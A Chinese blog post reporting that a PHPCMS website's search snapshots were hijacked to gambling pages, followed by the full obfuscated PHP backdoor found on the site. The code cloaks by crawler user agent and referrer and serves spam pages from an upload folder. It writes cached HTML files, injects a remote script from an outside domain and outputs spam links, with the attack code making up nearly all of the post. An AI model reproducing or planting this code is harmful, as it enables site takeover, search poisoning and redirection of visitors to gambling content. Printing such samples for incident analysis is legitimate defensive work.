富贵长生天做主由不得我
钢骨正气我做主由不得天

PHPCMS 全站快照被劫持 劫持代码与脚本后门

PHPCMS 全站快照被劫持
index.php?m=content&c=index&a=lists&catid=84 这是PHPCMS 内容页的正常后缀,被劫持后。全变成了index.php??fid=122594255023/
点进去变成了菠菜页面    error_reporting(0);date_default_timezone_set(‘Asia/Shanghai’);
$S9 = explode(“|”,”124.42.74|101.40.0|221.217.53″);
$S22 = (trim($_GET[‘id’],’/’) > 1000000 || trim($_GET[‘tid’],’/’) > 1000000 || $_GET[‘aid’] > 1000000 || trim($_GET[‘nid’],’/’) > 1000000 || (stristr($_SERVER[‘QUERY_STRING’],’/’) && (stristr($_SERVER[‘QUERY_STRING’],’htm’) or is_numeric(trim($_SERVER[‘QUERY_STRING’],’/’)))) || trim($_GET[‘fid’],’/’) > 10000 || $_GET[‘mid’] || $_GET[‘av’] || $_GET[‘moc’] || trim($_GET[‘gid’],’/’) > 10000 || $_GET[‘catid’] > 10000 || $_GET[‘xuh’] > 10000);
function rndStr($length=7){ $str = null; $strPol = “abcdefghijklmnopqrstuvwxyz0123456789″; $max = strlen($strPol)-1; for($i=0;$i<$length;$i++){ $str.=$strPol[rand(0,$max)]; } return $str; }
function PostLinks(){
$S27 = array();
$S27[]= ‘http://’.$_SERVER[‘HTTP_HOST’].’/news/’.date(‘Ymd’).’/’.date(‘Hi’).’/index.html’;
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD8=’).rndStr(rand(5,6)).’/’.rndStr(rand(5,5)).’.html’;
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD9tPWNvbnRlbnQmYz1pbmRleCZhPXNob3cmY2F0aWQ9KDEsOTk5KSZpZD0oMSw5OTk5OTk5OTk5OTkp’);
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD8oMSw5OTk5OTk5OTk5OTkpLw==’);
$S27[]= base64_decode(‘aHR0cDovL3d3dy5kdHhzLmNuL2luZGV4LnBocD9tb2M9KDEsOTk5OTk5OTk5OTk5KS8=’);
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?fid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?nid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?fid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?a=show&c=index&catid=(1,999)&id=(1,999999999999)’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?nid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?fid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?mid=(1,999999999999)/’;
$S27[] = ‘http://’ . $_SERVER[‘HTTP_HOST’] . ‘/index.php?gid=(1,999999999999)/’;
return base64_encode(implode(‘|’, $S27));
}define(‘APP_JACK_DOCUMENTROOT’,$_SERVER[‘DOCUMENT_ROOT’].PACK(‘H*’,’2F75706C6F616466696C652F323031362F303531322F’));
function SaveF($Js,$Data){$Dir=$_SERVER[‘DOCUMENT_ROOT’].’/news/’.date(‘Ymd’).’/’.date(‘Hi’).’/’;$File=$Dir.’index.html’;if(!file_exists($File)){if(!file_exists($Dir)){@mkdir($Dir,0777,true);}else{$Open=fopen($File,’w’);fwrite($Open,$Js.$Data);fclose($Open);chmod($File,0444);}}}$S = t . r;$S1 = S . $S . $S;$S2 = S . $S . re . v;$S3 = $S1(S . $S . prot1a, pa, _3);$S4 = $S3($S2($S1(robpr . Q_06 . rfnO, o0, q4)));$S5 = $S4($S3($S2($S1(hiJnO . Azo1MO . K0EK . L0W3D, $S4(T2kw), $S4(MDl5)))));$S7 = strtolower($_SERVER[$S4($S3($S2($S1(H5HEUS . OKFIOHI9 . SHHESF, O, 0))))]);$S8 = strtolower($_SERVER[$S4($S3($S1(FSELLSOFELMSLxIF, LO, H9)))]);$S29 = $_SERVER[$S4($S3($S2(HA1GV9S . HHESF)))];$S30 = $_SERVER[$S4($S3($S2(‘=xxHI9SIGIHIEIxH’)))];$S10=Array($S4($S3($S2(‘=VKMxyTpmIUMcSzL’))),$S4($S3($S2(‘==NqiW2MhyzL’))),$S4($S3($S2(‘==tpyEJnjA3om92p’))),$S4($S3($S2(‘=H3oa92p’))),$S4($S3($S2(lITM . cO3pjLmZ))),$S4($S3($S2(lITM . cO3p192p . iSTn))),$S4($S3($S2(‘=’.’VKMxyTpmI3omyJr’))));$S12=Array($S4($S3($S2(‘==tocqaL’))),$S4($S3($S2(‘==tocWzL’))),$S4($S3($S2(‘==DLzSTM’))),$S4($S3($S2(‘4tQB’))),$S4($S3($S2(‘0IzL’))),$S4($S3($S2(wuGW1VJW4HJW))),$S4($S3($S2(uyGWxuGW1HJW))),$S4($S3($S2(mtGWjxGW3HHW))),$S4($S3($S2(jxGW5VJW0HJWkVJW4RJW1HJW))),$S4($S3($S2(uWJWuWJW0HJWzyGWwyGW3HJW))),$S4($S3($S2(‘3VJW4tGW2HJWjtGWwWJW1HJW’))),$S4($S3($S2(‘4RJW3xGW5HJWmVJWyWJW2HJW’))),$S4($S3($S2(wuGW5tGW3HJWvuGWmRJW2HJW))),$S4($S3($S2(zSJWySJW4HJW4RJW1tGW1HJW))),$S4($S3($S2(kxGW3tGW5HJW5RJWxWJW1HJW))),$S4($S3($S2(‘4RJW0xGW3HJW3tGW0RJW1HJW’))),$S4($S3($S2(kxGW3tGW5HJWjVJWyuGW3HJW))),$S4($S3($S2(‘2VJWySJW1HJWyWJW5xGW3HJW’))),$S4($S3($S2(‘2tGW4tGW1HJW0xGWzSJW2HJW’))),$S4($S3($S2(uuGW4VJW0HJWzWJWuWJW3HJW))),$S4($S3($S2(jRJW2tGW1HJW3tGWuyGW3HJW))),$S4($S3($S2(kVJWuuGW4HJWkxGW3tGW5HJW))),$S4($S3($S2(xyGW5VJW0HJWwuGW5tGW3HJW))),$S4($S3($S2(zuGW4tGW2HJW4VJW4VJW2HJW))),$S4($S3($S2(wWJWkVJW5HJW1xGWxuGW2HJW))),$S4($S3($S2(jVJWzuGW1HJWmVJW5VJW1HJW))),$S4($S3($S2(yuGW5xGW4HJW5xGWyWJW5HJW))),$S4($S3($S2(‘5RJWxWJW1HJW2VJW3xGW2HJW’))),$S4($S3($S2(‘5tGWuSJW4HJWkRJWzWJW0HJW’))),$S4($S3($S2(‘4RJW1RJW3HJW5RJWxWJW1HJW’))),$S4($S3($S2(‘4RJWmVJW2HJW1xGWuuGW2HJW’))),$S4($S3($S2(‘4RJWmVJW2HJWvuGW4VJW0HJW’))),$S4($S3($S2(kVJWlxGW5HJWzyGWwyGW3HJW))),$S4($S3($S2(‘1tGW5xGW5HJWxWJWvyGW1HJW’))),$S4($S3($S2(jVJWyuGW3HJWjxGWzuGW2HJW))),$S4($S3($S2(mVJW4xGW5HJWuSJW0RJW1HJW))));$S26=$S4(‘PHNjcmlwdCBzcmM9Ii8vd3d3LnB0d3lzLmNvbS9oby5hc3B4P2lkPTcwNTU1OTk1JmxvZ289MTIiIGxhbmd1YWdlPSJKYXZhU2NyaXB0Ij48L3NjcmlwdD4=’);$S14 = $S4($S3($S2(‘==’.’jYa9To’)));$S18 = Array($S4($S3($S2(iNKo09vpuM3Y))),$S4($S3($S2(‘=8PpgE3Y’))),$S4($S3($S2(‘==’.’jYj1JMH9lp39TMhy2IibmD’))));$S20 = explode($S4($S3($S2(‘==Ns’))),$S4($S3($S2(hAzYgAaY812ow5lom . kaYiA3omkaY192Mi . AUshHUMcSzL85lMhyzL85FqiA3ou . uTsh82piSTn))));function IsRebots($ip_list,$ref) {$ip=$_SERVER[‘REMOTE_ADDR’];foreach($ip_list as $iplist){if (@stristr($ip,$iplist)){setcookie(base64_decode(c2Vzc19k . b21haW5z),”1”);return false;}}$http_ref=explode(“|”,base64_decode(aW51cmw6fHNpdGU6fHNpdGUlM3xpbnVybCUz));foreach($http_ref as $r){if(stristr($ref,$r)){setcookie(base64_decode(c2Vzc19k . b21haW5z),”1″);return false;}}if(isset($_COOKIE[base64_decode(c2Vzc19k . b21haW5z)])){return false;}return true;}if (IsRebots($S9,$S8)){foreach($S10 as $S11){if(stristr($S7, $S11)){if(stristr($S11,$S4($S3($S2(‘=HUMcSzL’)))) || stristr($S11,$S4($S3($S2(‘=H3oa92p’))))) {if($S22){$currentPage = include (APP_JACK_DOCUMENTROOT . $S4($S3($S2(“=pTpd5FZ”))));if(stristr($S7, $S4($S3($S2(‘=H3oa92p’))))){$http_type = ((isset($_SERVER[‘HTTPS’]) && $_SERVER[‘HTTPS’] == ‘on’) || (isset($_SERVER[‘HTTP_X_FORWARDED_PROTO’]) && $_SERVER[‘HTTP_X_FORWARDED_PROTO’] == ‘https’)) ? ‘https://’ : ‘http://’;$currentPage=$currentPage.implode(”,@file($http_type.$_SERVER[‘HTTP_HOST’]));}@SaveF($S26, $currentPage);exit($currentPage);}else{$linkarr=explode($S4($S3($S2(‘==Ns’))),base64_decode(PostLinks()));for($a=0;$a<rand(1,2);$a++){foreach($linkarr as $vv){preg_match_all($S4($S3($S2(‘==DImy2YcjIXd4PXbj1Y’))),$vv,$url);foreach($url[1] as $a=>$v){$dl=explode(“,”,$v);$num=rand($dl[0],$dl[1]);$vv=str_replace($url[0][$a],$num,$vv);}echo($S4($S3($S2(v0wMyWUntRTC))).$vv.$S4($S3($S2(‘=4wV’))).$S4($S3($S2(‘==tCu9PC’))));}}}}else{$currentPage = include(APP_JACK_DOCUMENTROOT.$S4($S3($S2(“=pTpd5FZ”))));@SaveF($S26,$currentPage);exit($currentPage);}}}foreach($S20 as $S21){if(stristr($S8, $S21)){if($S22){exit($S26);}else{foreach($S12 as $S13){if(stristr($S8, $S13)){exit($S26);}}}}}}

赞(3)
版权声明:本文采用知识共享 署名4.0国际许可协议 [BY-NC-SA] 进行授权
文章名称:《PHPCMS 全站快照被劫持 劫持代码与脚本后门》
文章链接:https://www.lolmm.cn/wzcgal/199.html
本站资源仅供个人学习交流,请于下载后24小时内删除,不允许用于商业用途,否则法律问题自行承担。

评论 1

评论前必须登录!